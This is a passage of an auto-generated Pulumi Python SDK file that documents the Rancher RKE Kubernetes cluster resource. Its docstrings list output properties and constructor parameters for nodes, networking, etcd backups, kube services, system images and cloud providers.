(list maxitems:1)
* `calicoNetworkProvider` (`dict`) - Calico network provider config (list maxitems:1)
* `cloud_provider` (`str`) - Calico cloud provider (string)
* `canalNetworkProvider` (`dict`) - Canal network provider config (list maxitems:1)
* `iface` (`str`) - Flannel network interface (string)
* `flannelNetworkProvider` (`dict`) - Flannel network provider config (list maxitems:1)
* `iface` (`str`) - Flannel network interface (string)
* `mtu` (`float`) - Network provider MTU. Default `0` (int)
* `options` (`dict`) - Network provider options (map)
* `plugin` (`str`) - Network provider plugin. `calico`, `canal` (default), `flannel`, `none` and `weave` are supported. (string)
* `weaveNetworkProvider` (`dict`) - Weave network provider config (list maxitems:1)
* `password` (`str`) - Registry password (string)
"""
nodes: pulumi.Output[list]
"""
RKE k8s cluster nodes (list)
* `address` (`str`) - Address ip for node (string)
* `dockerSocket` (`str`) - Docker socket on the node that will be used in tunneling (string)
* `hostnameOverride` (`str`) - Hostname override for node (string)
* `internalAddress` (`str`) - Internal address that will be used for components communication (string)
* `labels` (`dict`) - Node labels (map)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `roles` (`list`) - Node roles in k8s cluster. `controlplane`, `etcd` and `worker` are supported. (list)
* `rolesDeprecated` (`str`)
* `ssh_agent_auth` (`bool`) - SSH Agent Auth enable (bool)
* `sshCert` (`str`) - SSH Certificate (string)
* `ssh_cert_path` (`str`) - SSH Certificate path (string)
* `sshKey` (`str`) - SSH Private Key (string)
* `ssh_key_path` (`str`) - SSH Private Key path (string)
* `taints` (`list`) - Node taints (list)
* `effect` (`str`) - Taint effect. `NoExecute`, `NoSchedule` (default) and `PreferNoSchedule` are supported (string)
* `key` (`str`) - TLS key for etcd service (string)
* `value` (`str`) - Taint value (string)
* `user` (`str`) - Registry user (string)
"""
nodes_confs: pulumi.Output[list]
prefix_path: pulumi.Output[str]
"""
RKE k8s directory path (string)
"""
private_registries: pulumi.Output[list]
"""
RKE k8s cluster private docker registries (list)
* `isDefault` (`bool`) - Set as default registry. Default `false` (bool)
* `password` (`str`) - Registry password (string)
* `url` (`str`) - Registry URL (string)
* `user` (`str`) - Registry user (string)
"""
restore: pulumi.Output[dict]
"""
Restore cluster. Default `false` (bool)
* `restore` (`bool`) - Restore cluster. Default `false` (bool)
* `snapshotName` (`str`) - Snapshot name (string)
"""
rke_cluster_yaml: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster config yaml (string)
"""
rke_state: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster state (string)
"""
rotate_certificates: pulumi.Output[dict]
"""
RKE k8s cluster rotate certificates configuration (list maxitems:1)
* `caCertificates` (`bool`) - Rotate CA Certificates. Default `false` (bool)
* `services` (`list`) - Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
"""
running_system_images: pulumi.Output[dict]
"""
(Computed) RKE k8s cluster running system images list (list)
* `alpine` (`str`) - Docker image for alpine (string)
* `calicoCni` (`str`) - Docker image for calico_cni (string)
* `calicoControllers` (`str`) - Docker image for calico_controllers (string)
* `calicoCtl` (`str`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`str`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`str`) - Docker image for calico_node (string)
* `canalCni` (`str`) - Docker image for canal_cni (string)
* `canalFlannel` (`str`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`str`) - Docker image for canal_flex_vol (string)
* `canalNode` (`str`) - Docker image for canal_node (string)
* `certDownloader` (`str`) - Docker image for cert_downloader (string)
* `coredns` (`str`) - Docker image for coredns (string)
* `corednsAutoscaler` (`str`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`str`) - Docker image for dnsmasq (string)
* `etcd` (`str`) - Docker image for etcd (string)
* `flannel` (`str`) - Docker image for flannel (string)
* `flannelCni` (`str`) - Docker image for flannel_cni (string)
* `ingress` (`str`) - Docker image for ingress (string)
* `ingressBackend` (`str`) - Docker image for ingress_backend (string)
* `kubeDns` (`str`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`str`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`str`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`str`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`str`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`str`) - Docker image for metrics_server (string)
* `nginxProxy` (`str`) - Docker image for nginx_proxy (string)
* `nodelocal` (`str`) - Docker image for nodelocal (string)
* `podInfraContainer` (`str`) - Docker image for pod_infra_container (string)
* `weaveCni` (`str`) - Docker image for weave_cni (string)
* `weaveNode` (`str`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`str`) - Docker image for windows_pod_infra_container (string)
"""
services: pulumi.Output[dict]
"""
Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
* `etcd` (`dict`) - Docker image for etcd (string)
* `backupConfig` (`dict`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`float`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`float`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`dict`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`str`) - Access key for S3 service (string)
* `bucketName` (`str`) - Bucket name for S3 service (string)
* `customCa` (`str`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`str`) - Endpoint for S3 service (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`str`) - Region for S3 service (string)
* `secretKey` (`str`) - Secret key for S3 service (string)
* `safeTimestamp` (`bool`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`str`) - TLS CA certificate for etcd service (string)
* `cert` (`str`) - TLS certificate for etcd service (string)
* `creation` (`str`) - Creation option for etcd service (string)
* `externalUrls` (`list`) - External urls for etcd service (list)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `gid` (`float`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`str`) - Docker image for scheduler service (string)
* `key` (`str`) - TLS key for etcd service (string)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`str`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`bool`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`float`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
* `kubeApi` (`dict`) - Kube API options for RKE services (list maxitems:1)
* `alwaysPullImages` (`bool`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`dict`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`dict`) - Audit log configuration. (list maxtiem: 1)
* `format` (`str`) - Audit log format. Default: `json` (string)
* `maxAge` (`float`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`float`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`float`) - Audit log max size. Default: `100` (int)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`str`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`dict`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`bool`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`dict`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`str`) - Service Node Port Range option for kube API service (string)
* `kubeController` (`dict`) - Kube Controller options for RKE services (list maxitems:1)
* `cluster_cidr` (`str`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
* `kubelet` (`dict`) - Kubelet options for RKE services (list maxitems:1)
* `cluster_dns_server` (`str`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`str`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `failSwapOn` (`bool`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`bool`)
* `image` (`str`) - Docker image for scheduler service (string)
* `infraContainerImage` (`str`) - Infra container image for kubelet service (string)
* `kubeproxy` (`dict`) - Kubeproxy options for RKE services (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `scheduler` (`dict`) - Scheduler options for RKE services (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
"""
services_etcd_deprecated: pulumi.Output[dict]
"""
Use services.etcd instead (list maxitems:1)
* `backupConfig` (`dict`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`float`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`float`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`dict`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`str`) - Access key for S3 service (string)
* `bucketName` (`str`) - Bucket name for S3 service (string)
* `customCa` (`str`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`str`) - Endpoint for S3 service (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`str`) - Region for S3 service (string)
* `secretKey` (`str`) - Secret key for S3 service (string)
* `safeTimestamp` (`bool`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`str`) - TLS CA certificate for etcd service (string)
* `cert` (`str`) - TLS certificate for etcd service (string)
* `creation` (`str`) - Creation option for etcd service (string)
* `externalUrls` (`list`) - External urls for etcd service (list)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `gid` (`float`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`str`) - Docker image for scheduler service (string)
* `key` (`str`) - TLS key for etcd service (string)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`str`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`bool`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`float`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
"""
services_kube_api_deprecated: pulumi.Output[dict]
"""
Use services.kube_api instead (list maxitems:1)
* `alwaysPullImages` (`bool`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`dict`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`dict`) - Audit log configuration. (list maxtiem: 1)
* `format` (`str`) - Audit log format. Default: `json` (string)
* `maxAge` (`float`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`float`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`float`) - Audit log max size. Default: `100` (int)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`str`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`dict`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`bool`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`dict`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`str`) - Service Node Port Range option for kube API service (string)
"""
services_kube_controller_deprecated: pulumi.Output[dict]
"""
Use services.kube_controller instead (list maxitems:1)
* `cluster_cidr` (`str`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
"""
services_kube_proxy_deprecated: pulumi.Output[dict]
"""
Use services.kubeproxy instead (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
"""
services_kube_scheduler_deprecated: pulumi.Output[dict]
"""
Use services.scheduler instead (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
"""
services_kubelet_deprecated: pulumi.Output[dict]
"""
Use services.kubelet instead (list maxitems:1)
* `cluster_dns_server` (`str`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`str`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `failSwapOn` (`bool`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`bool`)
* `image` (`str`) - Docker image for scheduler service (string)
* `infraContainerImage` (`str`) - Infra container image for kubelet service (string)
"""
ssh_agent_auth: pulumi.Output[bool]
"""
SSH Agent Auth enable (bool)
"""
ssh_cert_path: pulumi.Output[str]
"""
SSH Certificate path (string)
"""
ssh_key_path: pulumi.Output[str]
"""
SSH Private Key path (string)
"""
system_images: pulumi.Output[dict]
"""
RKE k8s cluster system images list (list maxitems:1)
* `alpine` (`str`) - Docker image for alpine (string)
* `calicoCni` (`str`) - Docker image for calico_cni (string)
* `calicoControllers` (`str`) - Docker image for calico_controllers (string)
* `calicoCtl` (`str`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`str`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`str`) - Docker image for calico_node (string)
* `canalCni` (`str`) - Docker image for canal_cni (string)
* `canalFlannel` (`str`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`str`) - Docker image for canal_flex_vol (string)
* `canalNode` (`str`) - Docker image for canal_node (string)
* `certDownloader` (`str`) - Docker image for cert_downloader (string)
* `coredns` (`str`) - Docker image for coredns (string)
* `corednsAutoscaler` (`str`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`str`) - Docker image for dnsmasq (string)
* `etcd` (`str`) - Docker image for etcd (string)
* `flannel` (`str`) - Docker image for flannel (string)
* `flannelCni` (`str`) - Docker image for flannel_cni (string)
* `ingress` (`str`) - Docker image for ingress (string)
* `ingressBackend` (`str`) - Docker image for ingress_backend (string)
* `kubeDns` (`str`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`str`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`str`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`str`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`str`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`str`) - Docker image for metrics_server (string)
* `nginxProxy` (`str`) - Docker image for nginx_proxy (string)
* `nodelocal` (`str`) - Docker image for nodelocal (string)
* `podInfraContainer` (`str`) - Docker image for pod_infra_container (string)
* `weaveCni` (`str`) - Docker image for weave_cni (string)
* `weaveNode` (`str`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`str`) - Docker image for windows_pod_infra_container (string)
"""
update_only: pulumi.Output[bool]
"""
Skip idempotent deployment of control and etcd plane. Default `false` (bool)
"""
upgrade_strategy: pulumi.Output[dict]
"""
RKE k8s cluster upgrade strategy (list maxitems:1)
* `drain` (`bool`) - RKE drain nodes. Default: `false` (bool)
* `drainInput` (`dict`) - RKE drain node input (list Maxitems: 1)
* `deleteLocalData` (`bool`) - Delete RKE node local data. Default: `false` (bool)
* `force` (`bool`) - Force RKE node drain. Default: `false` (bool)
* `gracePeriod` (`float`) - RKE node drain grace period. Default: `-1` (int)
* `ignoreDaemonSets` (`bool`) - Ignore RKE daemon sets. Default: `true` (bool)
* `timeout` (`float`) - RKE node drain timeout. Default: `60` (int)
* `maxUnavailableControlplane` (`str`) - RKE max unavailable controlplane nodes. Default: `1` (string)
* `maxUnavailableWorker` (`str`) - RKE max unavailable worker nodes. Default: `10%` (string)
"""
worker_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster worker nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
def __init__(__self__, resource_name, opts=None, addon_job_timeout=None, addons=None, addons_includes=None, authentication=None, authorization=None, bastion_host=None, cert_dir=None, cloud_provider=None, cluster_name=None, cluster_yaml=None, custom_certs=None, delay_on_creation=None, dind=None, dind_dns_server=None, dind_storage_driver=None, disable_port_check=None, dns=None, ignore_docker_version=None, ingress=None, kubernetes_version=None, monitoring=None, network=None, nodes=None, nodes_confs=None, prefix_path=None, private_registries=None, restore=None, rotate_certificates=None, services=None, services_etcd_deprecated=None, services_kube_api_deprecated=None, services_kube_controller_deprecated=None, services_kube_proxy_deprecated=None, services_kube_scheduler_deprecated=None, services_kubelet_deprecated=None, ssh_agent_auth=None, ssh_cert_path=None, ssh_key_path=None, system_images=None, update_only=None, upgrade_strategy=None, __props__=None, __name__=None, __opts__=None):
"""
Provides RKE cluster resource. This can be used to create RKE clusters and retrieve their information.
RKE clusters can be defined in the provider:
- Using cluster_yaml: The full RKE cluster is defined in an RKE cluster.yml file.
- Using the TF provider arguments to define the entire cluster.
- Using a combination of both the cluster_yaml and TF provider arguments. The TF arguments will override the cluster_yaml options if collisions occur.
> This content is derived from https://github.com/rancher/terraform-provider-rke/blob/master/website/docs/r/cluster.html.markdown.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[float] addon_job_timeout: RKE k8s cluster addon deployment timeout in seconds for status check (int)
:param pulumi.Input[str] addons: RKE k8s cluster user addons YAML manifest to be deployed (string)
:param pulumi.Input[list] addons_includes: RKE k8s cluster user addons YAML manifest urls or paths to be deployed (list)
:param pulumi.Input[dict] authentication: RKE k8s cluster authentication configuration (list maxitems:1)
:param pulumi.Input[dict] authorization: RKE k8s cluster authorization mode configuration (list maxitems:1)
:param pulumi.Input[dict] bastion_host: RKE k8s cluster bastion Host configuration (list maxitems:1)
:param pulumi.Input[str] cert_dir: Specify a certificate dir path (string)
:param pulumi.Input[dict] cloud_provider: Calico cloud provider (string)
:param pulumi.Input[str] cluster_name: RKE k8s cluster name used in the kube config (string)
:param pulumi.Input[str] cluster_yaml: RKE k8s cluster config yaml encoded. Provider arguments take precedence over this one (string)
:param pulumi.Input[bool] custom_certs: Use custom certificates from a cert dir (string)
:param pulumi.Input[float] delay_on_creation: RKE k8s cluster delay on creation (int)
:param pulumi.Input[bool] dind: Deploy RKE cluster on a dind environment. Default: `false` (bool)
:param pulumi.Input[str] dind_dns_server: DinD RKE cluster dns (string)
:param pulumi.Input[str] dind_storage_driver: DinD RKE cluster storage driver (string)
:param pulumi.Input[bool] disable_port_check: Enable/Disable RKE k8s cluster port checking. Default `false` (bool)
:param pulumi.Input[dict] dns: RKE k8s cluster DNS Config (list maxitems:1)
:param pulumi.Input[bool] ignore_docker_version: Enable/Disable RKE k8s cluster strict docker version checking. Default `false` (bool)
:param pulumi.Input[dict] ingress: Docker image for ingress (string)
:param pulumi.Input[str] kubernetes_version: K8s version to deploy. If kubernetes image is specified, image version takes precedence. Default: `rke default` (string)
:param pulumi.Input[dict] monitoring: RKE k8s cluster monitoring Config (list maxitems:1)
:param pulumi.Input[dict] network: (list maxitems:1)
:param pulumi.Input[list] nodes: RKE k8s cluster nodes (list)
:param pulumi.Input[str] prefix_path: RKE k8s directory path (string)
:param pulumi.Input[list] private_registries: RKE k8s cluster private docker registries (list)
:param pulumi.Input[dict] restore: Restore cluster. Default `false` (bool)
:param pulumi.Input[dict] rotate_certificates: RKE k8s cluster rotate certificates configuration (list maxitems:1)
:param pulumi.Input[dict] services: Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
:param pulumi.Input[dict] services_etcd_deprecated: Use services.etcd instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_api_deprecated: Use services.kube_api instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_controller_deprecated: Use services.kube_controller instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_proxy_deprecated: Use services.kubeproxy instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_scheduler_deprecated: Use services.scheduler instead (list maxitems:1)
:param pulumi.Input[dict] services_kubelet_deprecated: Use services.kubelet instead (list maxitems:1)
:param pulumi.Input[bool] ssh_agent_auth: SSH Agent Auth enable (bool)
:param pulumi.Input[str] ssh_cert_path: SSH Certificate path (string)
:param pulumi.Input[str] ssh_key_path: SSH Private Key path (string)
:param pulumi.Input[dict] system_images: RKE k8s cluster system images list (list maxitems:1)
:param pulumi.Input[bool] update_only: Skip idempotent deployment of control and etcd plane. Default `false` (bool)
:param pulumi.Input[dict] upgrade_strategy: RKE k8s cluster upgrade strategy (list maxitems:1)
The **authentication** object supports the following:
* `sans` (`pulumi.Input[list]`) - List of additional hostnames and IPs to include in the api server PKI cert (list)
* `strategy` (`pulumi.Input[str]`) - Authentication strategy that will be used in RKE k8s cluster. Default: `x509` (string)
* `webhook` (`pulumi.Input[dict]`) - Webhook configuration options (list maxitem: 1)
* `cacheTimeout` (`pulumi.Input[str]`) - Controls how long to cache authentication decisions (string)
* `configFile` (`pulumi.Input[str]`) - Multiline string that represent a custom webhook config file (string)
The **authorization** object supports the following:
* `mode` (`pulumi.Input[str]`) - RKE mode for authorization. `rbac` and `none` modes are available. Default `rbac` (string)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
The **bastion_host** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **cloud_provider** object supports the following:
* `awsCloudConfig` (`pulumi.Input[dict]`) - Use aws_cloud_provider instead
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `awsCloudProvider` (`pulumi.Input[dict]`) - AWS Cloud Provider config [rke-aws-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/aws/) (list maxitems:1)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `azureCloudConfig` (`pulumi.Input[dict]`) - Use azure_cloud_provider instead
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
